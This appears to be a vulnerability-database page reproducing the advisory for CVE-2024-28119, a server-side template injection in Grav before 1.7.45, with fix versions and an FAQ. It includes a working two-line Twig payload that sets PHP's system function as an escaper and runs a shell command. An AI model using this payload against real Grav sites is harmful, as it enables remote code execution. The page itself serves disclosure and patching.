CVE-2024-28119: Grav vulnerable to Server Side Template Injection (SSTI) via Twig escape handler
First published: Thu Mar 21 2024(Updated: )
### Summary Due to the unrestricted access to twig extension class from grav context, an attacker can redefine the escape function and execute arbitrary commands. ### Details https://github.com/twigphp/Twig/blob/3.x/src/Extension/EscaperExtension.php#L99 ```php /** * Defines a new escaper to be used via the escape filter. * * @param string $strategy The strategy name that should be used as a strategy in the escape call * @param callable $callable A valid PHP callable */ public function setEscaper($strategy, callable $callable) { $this->escapers[$strategy] = $callable; } ``` Twig supports the functionality to redefine the escape function through the setEscaper method. However, that method is not originally exposed to the twig environment, but it is accessible through the payload below. ```plaintext {{ grav.twig.twig.extensions.core.setEscaper('a','a') }} ``` At this point, it accepts callable type as an argument, but as there is no validation for the $callable variable, attackers can set dangerous functions like system as the escaper function. ### PoC ``` {{ var_dump(grav.twig.twig.extensions.core.setEscaper('system','twig_array_filter')) }} {{ var_dump(['id'] | escape('system', 'system')) }} ``` ### Impact Twig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages. As the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance.
Credit: security-advisories@github.com security-advisories@github.com
| Affected Software | Affected Version | How to fix |
|---|---|---|
| composer/getgrav/grav | <1.7.45 | 1.7.45 |
| Getgrav | <1.7.45 |
Never miss a vulnerability like this again
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
Reference Links
- https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58
- https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe
- https://github.com/twigphp/Twig/blob/3.x/src/Extension/EscaperExtension.php#L99
- https://nvd.nist.gov/vuln/detail/CVE-2024-28119
- https://github.com/advisories/GHSA-2m7x-c7px-hp58 (Advisory)
Frequently Asked Questions
What is the severity of CVE-2024-28119?
The severity of CVE-2024-28119 is considered high due to the potential for arbitrary command execution.
How do I fix CVE-2024-28119?
To fix CVE-2024-28119, upgrade to version 1.7.45 or later of the Getgrav Grav package.
What causes CVE-2024-28119?
CVE-2024-28119 is caused by unrestricted access to the Twig extension class from the Grav context.
Which versions of Getgrav Grav are affected by CVE-2024-28119?
CVE-2024-28119 affects all versions of Getgrav Grav prior to 1.7.45.
What type of vulnerability is CVE-2024-28119?
CVE-2024-28119 is a code execution vulnerability that allows attackers to redefine the escape function.
- agent/weakness
- agent/title
- agent/type
- agent/first-publish-date
- agent/references
- agent/description
- agent/event
- agent/author
- collector/epss-latest
- source/FIRST
- agent/epss
- collector/mitre-cve
- source/MITRE
- agent/trending
- agent/remedy
- agent/softwarecombine
- collector/github-advisory-latest
- source/GitHub
- alias/GHSA-2m7x-c7px-hp58
- alias/CVE-2024-28119
- agent/software-canonical-lookup
- agent/last-modified-date
- collector/github-advisory
- agent/severity
- agent/source
- agent/tags
- collector/nvd-api
- source/NVD
- agent/software-canonical-lookup-request
- collector/nvd-cve
- package-manager/composer
- vendor/getgrav
- canonical/getgrav